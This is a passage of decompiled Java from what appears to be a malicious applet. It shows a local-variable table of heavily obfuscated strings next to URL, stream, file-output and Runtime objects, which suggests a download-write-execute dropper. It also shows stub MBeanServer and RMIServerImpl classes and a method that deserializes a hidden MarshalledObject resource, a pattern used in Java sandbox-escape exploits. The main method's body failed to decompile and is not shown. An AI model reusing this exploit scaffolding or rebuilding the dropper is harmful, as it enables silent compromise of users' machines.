        //  1041   2024    71    NmoM4pr           Ljava/lang/String;
        //  1046   2019    72    ZsbN5fr           Ljava/lang/String;
        //  1051   2014    73    NaiK8qq           Ljava/lang/String;
        //  1056   2009    74    EgeD4fb           Ljava/lang/String;
        //  1061   2004    75    ZlwK3yn           Ljava/lang/String;
        //  1066   1999    76    YqhM7bd           Ljava/lang/String;
        //  1071   1994    77    FswK2tm           Ljava/lang/String;
        //  1076   1989    78    SmgZ1vi           Ljava/lang/String;
        //  1081   1984    79    QmkF3tv           Ljava/lang/String;
        //  1086   1979    80    PpyM3gv           Ljava/lang/String;
        //  1091   1974    81    YmbW6fg           Ljava/lang/String;
        //  1096   1969    82    NglW3ju           Ljava/lang/String;
        //  1101   1964    83    LoxQ4rn           Ljava/lang/String;
        //  1106   1959    84    XdqL3hm           Ljava/lang/String;
        //  1124   1941    85    Nigro             Ljava/lang/String;
        //  1129   1936    86    OryF3nn           Ljava/lang/String;
        //  1134   1931    87    DccZ2ox           Ljava/lang/String;
        //  1139   1926    88    DikQ8dm           Ljava/lang/String;
        //  1144   1921    89    AjrH7jw           Ljava/lang/String;
        //  1149   1916    90    EuwP1su           Ljava/lang/String;
        //  1154   1911    91    JrlZ3cj           Ljava/lang/String;
        //  1159   1906    92    SqtD9eq           Ljava/lang/String;
        //  1164   1901    93    PzrE4ki           Ljava/lang/String;
        //  1169   1896    94    TjiJ6za           Ljava/lang/String;
        //  1174   1891    95    TzdT2fw           Ljava/lang/String;
        //  1179   1886    96    IjvW3xq           Ljava/lang/String;
        //  1184   1881    97    EtcN2fm           Ljava/lang/String;
        //  1189   1876    98    AwcW2xx           Ljava/lang/String;
        //  1194   1871    99    ZagQ7es           Ljava/lang/String;
        //  1199   1866    100   BiwG9rf           Ljava/lang/String;
        //  1204   1861    101   RozY8pb           Ljava/lang/String;
        //  1209   1856    102   FvoF4bk           Ljava/lang/String;
        //  1214   1851    103   JdyT7rl           Ljava/lang/String;
        //  1219   1846    104   XcdQ6vi           Ljava/lang/String;
        //  1224   1841    105   YdiL4db           Ljava/lang/String;
        //  1229   1836    106   RopK8ox           Ljava/lang/String;
        //  1234   1831    107   ChkA2hh           Ljava/lang/String;
        //  1239   1826    108   UaeQ5qw           Ljava/lang/String;
        //  1244   1821    109   TwjZ9pg           Ljava/lang/String;
        //  1261   1804    110   s1                Ljava/lang/String;
        //  1266   1794    111   UbhG5rd           Ljava/lang/String;
        //  1271   1789    112   WrxN9zz           Ljava/lang/String;
        //  1276   1784    113   EthG7yv           Ljava/lang/String;
        //  1281   1779    114   KbpS1ji           Ljava/lang/String;
        //  1286   1774    115   VxqM7vk           Ljava/lang/String;
        //  1291   1769    116   PniD9br           Ljava/lang/String;
        //  1296   1764    117   JocJ3xj           Ljava/lang/String;
        //  1301   1759    118   DurW1xj           Ljava/lang/String;
        //  1306   1754    119   UmoI2jh           Ljava/lang/String;
        //  1311   1749    120   BzmX1ag           Ljava/lang/String;
        //  1316   1744    121   YigT8li           Ljava/lang/String;
        //  1321   1739    122   FtqQ2iw           Ljava/lang/String;
        //  1326   1734    123   KtpW6ng           Ljava/lang/String;
        //  1331   1729    124   OlvZ1ib           Ljava/lang/String;
        //  1336   1724    125   PpkO7qb           Ljava/lang/String;
        //  1341   1719    126   ClpG1vg           Ljava/lang/String;
        //  1346   1714    127   PnoU9gq           Ljava/lang/String;
        //  1351   1709    128   GlvN5jx           Ljava/lang/String;
        //  1356   1704    129   WpwZ9yx           Ljava/lang/String;
        //  1361   1699    130   WqzV1ra           Ljava/lang/String;
        //  1366   1694    131   TuyN9kf           Ljava/lang/String;
        //  1371   1689    132   ZwtW3dz           Ljava/lang/String;
        //  1376   1684    133   HzcT3rp           Ljava/lang/String;
        //  1381   1679    134   YosX5uc           Ljava/lang/String;
        //  1386   1674    135   NhgE7ma           Ljava/lang/String;
        //  1391   1669    136   JxhZ1to           Ljava/lang/String;
        //  1396   1664    137   KdrR8en           Ljava/lang/String;
        //  1401   1659    138   DzjP6if           Ljava/lang/String;
        //  1412   1648    139   url               Ljava/net/URL;
        //  1417   1643    140   ZimA2mh           Ljava/lang/String;
        //  1422   1638    141   LfaK8sh           Ljava/lang/String;
        //  1427   1633    142   XsyC1cv           Ljava/lang/String;
        //  1432   1628    143   JueR5og           Ljava/lang/String;
        //  1437   1623    144   JyvP8ig           Ljava/lang/String;
        //  1442   1618    145   PxxD6kz           Ljava/lang/String;
        //  1447   1613    146   SnsD9hw           Ljava/lang/String;
        //  1452   1608    147   McsS4za           Ljava/lang/String;
        //  1457   1603    148   XyuR2nx           Ljava/lang/String;
        //  1462   1598    149   ZxjV3dd           Ljava/lang/String;
        //  1467   1593    150   NkcM2rb           Ljava/lang/String;
        //  1472   1588    151   EtzR8oy           Ljava/lang/String;
        //  1477   1583    152   DzzS6kw           Ljava/lang/String;
        //  1482   1578    153   EjiA2fl           Ljava/lang/String;
        //  1487   1573    154   AtkJ8ck           Ljava/lang/String;
        //  1492   1568    155   XjjD4wq           Ljava/lang/String;
        //  1497   1563    156   ChiN2sk           Ljava/lang/String;
        //  1502   1558    157   AtyV6ag           Ljava/lang/String;
        //  1507   1553    158   BviM1mw           Ljava/lang/String;
        //  1512   1548    159   AywT6lw           Ljava/lang/String;
        //  1517   1543    160   JeiZ3eb           Ljava/lang/String;
        //  1528   1532    161   EyjH9tb           Ljava/lang/String;
        //  1533   1527    162   LgwU6cw           Ljava/lang/String;
        //  1538   1522    163   BtlM8sv           Ljava/lang/String;
        //  1543   1517    164   TzvY2gq           Ljava/lang/String;
        //  1548   1512    165   IadW1jg           Ljava/lang/String;
        //  1553   1507    166   NkkB5oi           Ljava/lang/String;
        //  1558   1502    167   DghY4mx           Ljava/lang/String;
        //  1563   1497    168   QkjY2kg           Ljava/lang/String;
        //  1568   1492    169   OojE6xv           Ljava/lang/String;
        //  1573   1487    170   PvbU7um           Ljava/lang/String;
        //  1578   1482    171   QqwX7ly           Ljava/lang/String;
        //  1583   1477    172   QqeS6ko           Ljava/lang/String;
        //  1588   1472    173   XnvP1zm           Ljava/lang/String;
        //  1593   1467    174   KcyY1mj           Ljava/lang/String;
        //  1598   1462    175   ReyP3el           Ljava/lang/String;
        //  1603   1457    176   MvfX5js           Ljava/lang/String;
        //  1608   1452    177   GxoC6zy           Ljava/lang/String;
        //  1613   1447    178   EuvR8gg           Ljava/lang/String;
        //  1618   1442    179   UbpS7vk           Ljava/lang/String;
        //  1623   1437    180   YgkN9zn           Ljava/lang/String;
        //  1628   1432    181   ZslQ7au           Ljava/lang/String;
        //  1633   1427    182   EegL2ie           Ljava/lang/String;
        //  1638   1422    183   KngH8vw           Ljava/lang/String;
        //  1643   1417    184   HrmQ6op           Ljava/lang/String;
        //  1648   1412    185   QxuG3tp           Ljava/lang/String;
        //  1653   1407    186   GxjO1eq           Ljava/lang/String;
        //  1658   1402    187   CydX1ji           Ljava/lang/String;
        //  1663   1397    188   CyqH1db           Ljava/lang/String;
        //  1668   1392    189   CjyM9fk           Ljava/lang/String;
        //  1673   1387    190   ZgaM7ll           Ljava/lang/String;
        //  1678   1382    191   WbfW4uf           Ljava/lang/String;
        //  1683   1377    192   ZqdN2ml           Ljava/lang/String;
        //  1688   1372    193   YteK9sh           Ljava/lang/String;
        //  1693   1367    194   WqnI8qh           Ljava/lang/String;
        //  1700   1360    195   inputstream       Ljava/io/InputStream;
        //  1705   1355    196   JayB9ql           Ljava/lang/String;
        //  1710   1350    197   IxrN3lh           Ljava/lang/String;
        //  1715   1345    198   KinW1hg           Ljava/lang/String;
        //  1720   1340    199   JjmG5gg           Ljava/lang/String;
        //  1725   1335    200   FzyU9rb           Ljava/lang/String;
        //  1730   1330    201   RsmJ3kg           Ljava/lang/String;
        //  1735   1325    202   RzdN7cj           Ljava/lang/String;
        //  1740   1320    203   KktC3pg           Ljava/lang/String;
        //  1745   1315    204   PtrD4bj           Ljava/lang/String;
        //  1750   1310    205   SvlA3as           Ljava/lang/String;
        //  1755   1305    206   JubW9qu           Ljava/lang/String;
        //  1760   1300    207   FwrH3st           Ljava/lang/String;
        //  1765   1295    208   NwqJ8it           Ljava/lang/String;
        //  1770   1290    209   ChaQ5va           Ljava/lang/String;
        //  1775   1285    210   OcmP6kr           Ljava/lang/String;
        //  1780   1280    211   HeaS9tw           Ljava/lang/String;
        //  1785   1275    212   DhuS4yk           Ljava/lang/String;
        //  1790   1270    213   VmaL9ku           Ljava/lang/String;
        //  1795   1265    214   GtdA7bv           Ljava/lang/String;
        //  1800   1260    215   IwlD1st           Ljava/lang/String;
        //  1805   1255    216   TycP3kb           Ljava/lang/String;
        //  1810   1250    217   OavX4mn           Ljava/lang/String;
        //  1815   1245    218   FocZ3eq           Ljava/lang/String;
        //  1820   1240    219   UheC9tk           Ljava/lang/String;
        //  1825   1235    220   NakV8me           Ljava/lang/String;
        //  1830   1230    221   OprH2ii           Ljava/lang/String;
        //  1835   1225    222   AhgC7vy           Ljava/lang/String;
        //  1840   1220    223   EoxE7ig           Ljava/lang/String;
        //  1845   1215    224   IffR7yn           Ljava/lang/String;
        //  1850   1210    225   TyaW3aw           Ljava/lang/String;
        //  1855   1205    226   MbqF7bw           Ljava/lang/String;
        //  1860   1200    227   CxbR5iz           Ljava/lang/String;
        //  1865   1195    228   CayB2pj           Ljava/lang/String;
        //  1870   1190    229   WbtM2qu           Ljava/lang/String;
        //  1899   1161    230   fileoutputstream  Ljava/io/FileOutputStream;
        //  1904   1156    231   LbyE6gq           Ljava/lang/String;
        //  1909   1151    232   CshS3ho           Ljava/lang/String;
        //  1914   1146    233   UduS7oz           Ljava/lang/String;
        //  1919   1141    234   AadE6qg           Ljava/lang/String;
        //  1924   1136    235   YzkQ6am           Ljava/lang/String;
        //  1929   1131    236   RdfB4pt           Ljava/lang/String;
        //  1934   1126    237   MvlA3er           Ljava/lang/String;
        //  1939   1121    238   LoiA5li           Ljava/lang/String;
        //  1944   1116    239   CynD2ok           Ljava/lang/String;
        //  1949   1111    240   OwjQ1rs           Ljava/lang/String;
        //  1954   1106    241   HmoQ7vj           Ljava/lang/String;
        //  1959   1101    242   AlkL4fw           Ljava/lang/String;
        //  1964   1096    243   AkvW5qs           Ljava/lang/String;
        //  1969   1091    244   XwbZ2qv           Ljava/lang/String;
        //  1974   1086    245   GpjX6kt           Ljava/lang/String;
        //  1979   1081    246   NfjR1qu           Ljava/lang/String;
        //  1984   1076    247   AswL4pp           Ljava/lang/String;
        //  1989   1071    248   IhrT2tk           Ljava/lang/String;
        //  1994   1066    249   KgjN3rn           Ljava/lang/String;
        //  1999   1061    250   MdnK2fu           Ljava/lang/String;
        //  2004   1056    251   JokP6dy           Ljava/lang/String;
        //  2011   1049    252   abyte0            [B
        //  2014   10      253   i                 I
        //  2038   1022    253   i                 I
        //  2047   1013    254   GaoF7bx           Ljava/lang/String;
        //  2052   1008    255   ZbzZ2wg           Ljava/lang/String;
        //  2059   1001    256   TgzD8nt           Ljava/lang/String;
        //  2066   994     257   HciA9ns           Ljava/lang/String;
        //  2073   987     258   DauE6ak           Ljava/lang/String;
        //  2085   975     259   LwkU8my           Ljava/lang/String;
        //  2092   968     260   BynZ5te           Ljava/lang/String;
        //  2099   961     261   CkuH5md           Ljava/lang/String;
        //  2106   954     262   RwjQ8tr           Ljava/lang/String;
        //  2113   947     263   YquQ9xl           Ljava/lang/String;
        //  2120   940     264   PhkL4fx           Ljava/lang/String;
        //  2127   933     265   XpqI1se           Ljava/lang/String;
        //  2134   926     266   MhxC9mx           Ljava/lang/String;
        //  2141   919     267   OqaZ1xq           Ljava/lang/String;
        //  2148   912     268   UliN7wb           Ljava/lang/String;
        //  2155   905     269   FviQ8es           Ljava/lang/String;
        //  2162   898     270   UcrJ4py           Ljava/lang/String;
        //  2169   891     271   AxjN9ko           Ljava/lang/String;
        //  2176   884     272   DjqJ5qy           Ljava/lang/String;
        //  2183   877     273   KcsW7vp           Ljava/lang/String;
        //  2190   870     274   ZvdV7mh           Ljava/lang/String;
        //  2197   863     275   EmhI4ag           Ljava/lang/String;
        //  2204   856     276   ZwmE7ur           Ljava/lang/String;
        //  2211   849     277   TlzO6vh           Ljava/lang/String;
        //  2218   842     278   DgsB7zv           Ljava/lang/String;
        //  2225   835     279   JbyF8ly           Ljava/lang/String;
        //  2232   828     280   WdyL1fn           Ljava/lang/String;
        //  2239   821     281   FxeL4gu           Ljava/lang/String;
        //  2246   814     282   ZzvY3tg           Ljava/lang/String;
        //  2253   807     283   IawK1vf           Ljava/lang/String;
        //  2265   795     284   CziW7jz           Ljava/lang/String;
        //  2272   788     285   CpaJ3kn           Ljava/lang/String;
        //  2279   781     286   MkfJ3wa           Ljava/lang/String;
        //  2286   774     287   ZbnX1fp           Ljava/lang/String;
        //  2293   767     288   JkrR3yu           Ljava/lang/String;
        //  2300   760     289   IqhP6gf           Ljava/lang/String;
        //  2307   753     290   QzeX6cs           Ljava/lang/String;
        //  2314   746     291   MllF5it           Ljava/lang/String;
        //  2321   739     292   IsqR6vs           Ljava/lang/String;
        //  2328   732     293   UbtI6ba           Ljava/lang/String;
        //  2335   725     294   WgwU8qf           Ljava/lang/String;
        //  2342   718     295   JqfL3vk           Ljava/lang/String;
        //  2349   711     296   ScjM7dg           Ljava/lang/String;
        //  2356   704     297   DwpD1ao           Ljava/lang/String;
        //  2363   697     298   UhdG5zp           Ljava/lang/String;
        //  2370   690     299   UmzQ5lw           Ljava/lang/String;
        //  2377   683     300   CukM4sa           Ljava/lang/String;
        //  2384   676     301   SraQ2cs           Ljava/lang/String;
        //  2391   669     302   VucV2fh           Ljava/lang/String;
        //  2398   662     303   YbfJ4ha           Ljava/lang/String;
        //  2405   655     304   JbnA5tz           Ljava/lang/String;
        //  2412   648     305   RhvJ5tu           Ljava/lang/String;
        //  2419   641     306   PwwK6tc           Ljava/lang/String;
        //  2426   634     307   GikF3ro           Ljava/lang/String;
        //  2433   627     308   NybQ1vr           Ljava/lang/String;
        //  2440   620     309   RsuZ8pn           Ljava/lang/String;
        //  2447   613     310   DeyT2qc           Ljava/lang/String;
        //  2454   606     311   MxsH7kf           Ljava/lang/String;
        //  2461   599     312   RdmE8mj           Ljava/lang/String;
        //  2468   592     313   MjeV1of           Ljava/lang/String;
        //  2475   585     314   YxmR9yt           Ljava/lang/String;
        //  2482   578     315   CrkN5ce           Ljava/lang/String;
        //  2489   571     316   SapG4ha           Ljava/lang/String;
        //  2496   564     317   VtsX6ud           Ljava/lang/String;
        //  2503   557     318   EjuP5fg           Ljava/lang/String;
        //  2510   550     319   CtnG6aa           Ljava/lang/String;
        //  2517   543     320   KuvV2hy           Ljava/lang/String;
        //  2524   536     321   JpdZ7md           Ljava/lang/String;
        //  2531   529     322   PfxS9bn           Ljava/lang/String;
        //  2538   522     323   runtime           Ljava/lang/Runtime;
        //  2545   515     324   ZqwT8ss           Ljava/lang/String;
        //  2552   508     325   UpoG8ey           Ljava/lang/String;
        //  2559   501     326   VywW6pv           Ljava/lang/String;
        //  2566   494     327   GwhK9cs           Ljava/lang/String;
        //  2573   487     328   RjwV2en           Ljava/lang/String;
        //  2580   480     329   MycI5bt           Ljava/lang/String;
        //  2587   473     330   UqnI7zq           Ljava/lang/String;
        //  2594   466     331   TewN5sr           Ljava/lang/String;
        //  2601   459     332   OvcG1kj           Ljava/lang/String;
        //  2608   452     333   CzlU7mj           Ljava/lang/String;
        //  2615   445     334   QqcQ8ws           Ljava/lang/String;
        //  2622   438     335   BcoC7io           Ljava/lang/String;
        //  2629   431     336   JalJ5cp           Ljava/lang/String;
        //  2636   424     337   EsuZ4pg           Ljava/lang/String;
        //  2643   417     338   RojT8yv           Ljava/lang/String;
        //  2650   410     339   EgyQ3nz           Ljava/lang/String;
        //  2657   403     340   IgnQ1so           Ljava/lang/String;
        //  2664   396     341   OqqW5td           Ljava/lang/String;
        //  2671   389     342   OejP7wv           Ljava/lang/String;
        //  2678   382     343   UuuV5ub           Ljava/lang/String;
        //  2685   375     344   QvaN2hy           Ljava/lang/String;
        //  2692   368     345   EqvM1gx           Ljava/lang/String;
        //  2699   361     346   BcaD1hi           Ljava/lang/String;
        //  2706   354     347   YxcF5yy           Ljava/lang/String;
        //  2713   347     348   CbyD8ms           Ljava/lang/String;
        //  2720   340     349   HhsY1ml           Ljava/lang/String;
        //  2727   333     350   VyrY1jt           Ljava/lang/String;
        //  2734   326     351   RsbG7rq           Ljava/lang/String;
        //  2741   319     352   CitR4ti           Ljava/lang/String;
        //  2748   312     353   BdnH5qh           Ljava/lang/String;
        //  2755   305     354   CipC1en           Ljava/lang/String;
        //  2762   298     355   WioX7lh           Ljava/lang/String;
        //  2769   291     356   FufM3bx           Ljava/lang/String;
        //  2776   284     357   QhgK8cc           Ljava/lang/String;
        //  2783   277     358   WkqC4of           Ljava/lang/String;
        //  2790   270     359   JkmB7ny           Ljava/lang/String;
        //  2797   263     360   WxdI3th           Ljava/lang/String;
        //  2804   256     361   TaeJ7sk           Ljava/lang/String;
        //  2811   249     362   KamX2jf           Ljava/lang/String;
        //  2818   242     363   NgoQ9wh           Ljava/lang/String;
        //  2825   235     364   AsaV8hi           Ljava/lang/String;
        //  2832   228     365   KzoY7cb           Ljava/lang/String;
        //  2839   221     366   TybV5zt           Ljava/lang/String;
        //  2863   197     367   s2                Ljava/lang/String;
        //  2870   190     368   PphO6gu           Ljava/lang/String;
        //  2877   183     369   XohU6si           Ljava/lang/String;
        //  2884   176     370   HbsJ1jm           Ljava/lang/String;
        //  2891   169     371   VprU1gk           Ljava/lang/String;
        //  2898   162     372   XotN8qz           Ljava/lang/String;
        //  2905   155     373   IjcR4ga           Ljava/lang/String;
        //  2912   148     374   SnoA1fi           Ljava/lang/String;
        //  2919   141     375   LhqH4dr           Ljava/lang/String;
        //  2926   134     376   OodM2hj           Ljava/lang/String;
        //  2933   127     377   UzlE9mr           Ljava/lang/String;
        //  2940   120     378   NfsE9xj           Ljava/lang/String;
        //  2947   113     379   GahP8ae           Ljava/lang/String;
        //  2954   106     380   EsdV9mi           Ljava/lang/String;
        //  2961   99      381   XzdO6pt           Ljava/lang/String;
        //  2968   92      382   LmwW1dv           Ljava/lang/String;
        //  2975   85      383   YydW9nu           Ljava/lang/String;
        //  2982   78      384   AaoC8zq           Ljava/lang/String;
        //  2989   71      385   IquJ7gj           Ljava/lang/String;
        //  2996   64      386   HztE6hy           Ljava/lang/String;
        //  3003   57      387   JvvN5th           Ljava/lang/String;
        //  3010   50      388   EodZ1kl           Ljava/lang/String;
        //  3017   43      389   IzfE1ve           Ljava/lang/String;
        //  3024   36      390   EepO1pg           Ljava/lang/String;
        //  3031   29      391   ClrT4kl           Ljava/lang/String;
        //  3038   22      392   OstV8np           Ljava/lang/String;
        //  3045   15      393   JnbO3dn           Ljava/lang/String;
        //    Exceptions:
        //  Try           Handler
        //  Start  End    Start  End    Type                 
        //  -----  -----  -----  -----  ---------------------
        //  0      655    658    3066   Ljava/lang/Exception;
        //  1261   3057   3060   3065   Ljava/lang/Exception;
        //  659    3062   3065   3066   Ljava/lang/Exception;
        // 
        // The error that occurred was:
        // 
        // java.lang.NullPointerException
        //     at com.strobel.decompiler.ast.AstBuilder.convertLocalVariables(AstBuilder.java:2985)
        //     at com.strobel.decompiler.ast.AstBuilder.performStackAnalysis(AstBuilder.java:2445)
        //     at com.strobel.decompiler.ast.AstBuilder.build(AstBuilder.java:108)
        //     at com.strobel.decompiler.languages.java.ast.AstMethodBodyBuilder.createMethodBody(AstMethodBodyBuilder.java:210)
        //     at com.strobel.decompiler.languages.java.ast.AstMethodBodyBuilder.createMethodBody(AstMethodBodyBuilder.java:99)
        //     at com.strobel.decompiler.languages.java.ast.AstBuilder.createMethodBody(AstBuilder.java:757)
        //     at com.strobel.decompiler.languages.java.ast.AstBuilder.createMethod(AstBuilder.java:655)
        //     at com.strobel.decompiler.languages.java.ast.AstBuilder.addTypeMembers(AstBuilder.java:532)
        //     at com.strobel.decompiler.languages.java.ast.AstBuilder.createTypeCore(AstBuilder.java:499)
        //     at com.strobel.decompiler.languages.java.ast.AstBuilder.createTypeNoCache(AstBuilder.java:141)
        //     at com.strobel.decompiler.languages.java.ast.AstBuilder.createType(AstBuilder.java:130)
        //     at com.strobel.decompiler.languages.java.ast.AstBuilder.addType(AstBuilder.java:105)
        //     at com.strobel.decompiler.languages.java.JavaLanguage.buildAst(JavaLanguage.java:71)
        //     at com.strobel.decompiler.languages.java.JavaLanguage.decompileType(JavaLanguage.java:59)
        //     at com.strobel.decompiler.DecompilerDriver.decompileType(DecompilerDriver.java:317)
        //     at com.strobel.decompiler.DecompilerDriver.decompileJar(DecompilerDriver.java:238)
        //     at com.strobel.decompiler.DecompilerDriver.main(DecompilerDriver.java:138)
        // 
        throw new IllegalStateException("An error occurred while decompiling this method.");
    }
    
    private MBeanServer getMbeanServer() {
        return new MBeanServer() {
            public void unregisterMBean(final ObjectName name) throws InstanceNotFoundException, MBeanRegistrationException {
            }
            
            public AttributeList setAttributes(final ObjectName name, final AttributeList attributes) throws InstanceNotFoundException, ReflectionException {
                return null;
            }
            
            public void setAttribute(final ObjectName name, final Attribute attribute) throws InstanceNotFoundException, AttributeNotFoundException, InvalidAttributeValueException, MBeanException, ReflectionException {
            }
            
            public void removeNotificationListener(final ObjectName name, final NotificationListener listener, final NotificationFilter filter, final Object handback) throws InstanceNotFoundException, ListenerNotFoundException {
            }
            
            public void removeNotificationListener(final ObjectName name, final ObjectName listener, final NotificationFilter filter, final Object handback) throws InstanceNotFoundException, ListenerNotFoundException {
            }
            
            public void removeNotificationListener(final ObjectName name, final NotificationListener listener) throws InstanceNotFoundException, ListenerNotFoundException {
            }
            
            public void removeNotificationListener(final ObjectName name, final ObjectName listener) throws InstanceNotFoundException, ListenerNotFoundException {
            }
            
            public ObjectInstance registerMBean(final Object object, final ObjectName name) throws InstanceAlreadyExistsException, MBeanRegistrationException, NotCompliantMBeanException {
                return null;
            }
            
            public Set<ObjectName> queryNames(final ObjectName name, final QueryExp query) {
                return null;
            }
            
            public Set<ObjectInstance> queryMBeans(final ObjectName name, final QueryExp query) {
                return null;
            }
            
            public boolean isRegistered(final ObjectName name) {
                return false;
            }
            
            public boolean isInstanceOf(final ObjectName name, final String className) throws InstanceNotFoundException {
                return false;
            }
            
            public Object invoke(final ObjectName name, final String operationName, final Object[] params, final String[] signature) throws InstanceNotFoundException, MBeanException, ReflectionException {
                return null;
            }
            
            public Object instantiate(final String className, final ObjectName loaderName, final Object[] params, final String[] signature) throws ReflectionException, MBeanException, InstanceNotFoundException {
                return null;
            }
            
            public Object instantiate(final String className, final Object[] params, final String[] signature) throws ReflectionException, MBeanException {
                return null;
            }
            
            public Object instantiate(final String className, final ObjectName loaderName) throws ReflectionException, MBeanException, InstanceNotFoundException {
                return null;
            }
            
            public Object instantiate(final String className) throws ReflectionException, MBeanException {
                return null;
            }
            
            public ObjectInstance getObjectInstance(final ObjectName name) throws InstanceNotFoundException {
                return null;
            }
            
            public MBeanInfo getMBeanInfo(final ObjectName name) throws InstanceNotFoundException, IntrospectionException, ReflectionException {
                return null;
            }
            
            public Integer getMBeanCount() {
                return null;
            }
            
            public String[] getDomains() {
                return null;
            }
            
            public String getDefaultDomain() {
                return null;
            }
            
            public ClassLoaderRepository getClassLoaderRepository() {
                return new ClassLoaderRepository() {
                    public Class<?> loadClassWithout(final ClassLoader exclude, final String className) throws ClassNotFoundException {
                        return null;
                    }
                    
                    public Class<?> loadClassBefore(final ClassLoader stop, final String className) throws ClassNotFoundException {
                        return null;
                    }
                    
                    public Class<?> loadClass(final String className) throws ClassNotFoundException {
                        return null;
                    }
                };
            }
            
            public ClassLoader getClassLoaderFor(final ObjectName mbeanName) throws InstanceNotFoundException {
                return null;
            }
            
            public ClassLoader getClassLoader(final ObjectName loaderName) throws InstanceNotFoundException {
                return null;
            }
            
            public AttributeList getAttributes(final ObjectName name, final String[] attributes) throws InstanceNotFoundException, ReflectionException {
                return null;
            }
            
            public Object getAttribute(final ObjectName name, final String attribute) throws MBeanException, AttributeNotFoundException, InstanceNotFoundException, ReflectionException {
                return null;
            }
            
            public ObjectInputStream deserialize(final String className, final ObjectName loaderName, final byte[] data) throws InstanceNotFoundException, OperationsException, ReflectionException {
                return null;
            }
            
            public ObjectInputStream deserialize(final String className, final byte[] data) throws OperationsException, ReflectionException {
                return null;
            }
            
            public ObjectInputStream deserialize(final ObjectName name, final byte[] data) throws InstanceNotFoundException, OperationsException {
                return null;
            }
            
            public ObjectInstance createMBean(final String className, final ObjectName name, final ObjectName loaderName, final Object[] params, final String[] signature) throws ReflectionException, InstanceAlreadyExistsException, MBeanRegistrationException, MBeanException, NotCompliantMBeanException, InstanceNotFoundException {
                return null;
            }
            
            public ObjectInstance createMBean(final String className, final ObjectName name, final Object[] params, final String[] signature) throws ReflectionException, InstanceAlreadyExistsException, MBeanRegistrationException, MBeanException, NotCompliantMBeanException {
                return null;
            }
            
            public ObjectInstance createMBean(final String className, final ObjectName name, final ObjectName loaderName) throws ReflectionException, InstanceAlreadyExistsException, MBeanRegistrationException, MBeanException, NotCompliantMBeanException, InstanceNotFoundException {
                return null;
            }
            
            public ObjectInstance createMBean(final String className, final ObjectName name) throws ReflectionException, InstanceAlreadyExistsException, MBeanRegistrationException, MBeanException, NotCompliantMBeanException {
                return null;
            }
            
            public void addNotificationListener(final ObjectName name, final ObjectName listener, final NotificationFilter filter, final Object handback) throws InstanceNotFoundException {
            }
            
            public void addNotificationListener(final ObjectName name, final NotificationListener listener, final NotificationFilter filter, final Object handback) throws InstanceNotFoundException {
            }
        };
    }
    
    private RMIServerImpl getRMIServerImpl() {
        return new RMIServerImpl(null) {
            public Remote toStub() throws IOException {
                return null;
            }
            
            protected RMIConnection makeClient(final String connectionId, final Subject subject) throws IOException {
                return null;
            }
            
            protected String getProtocol() {
                return null;
            }
            
            protected void export() throws IOException {
            }
            
            protected void closeServer() throws IOException {
            }
            
            protected void closeClient(final RMIConnection client) throws IOException {
            }
        };
    }
    
    public MarshalledObject pepe() throws IOException, ClassNotFoundException {
        final InputStream f = this.getClass().getResourceAsStream("hjiuvfdolecrtezq");
        final ObjectInputStream stream = new ObjectInputStream(f);
        final MarshalledObject object = (MarshalledObject)stream.readObject();
        stream.close();
        return object;
    }
}
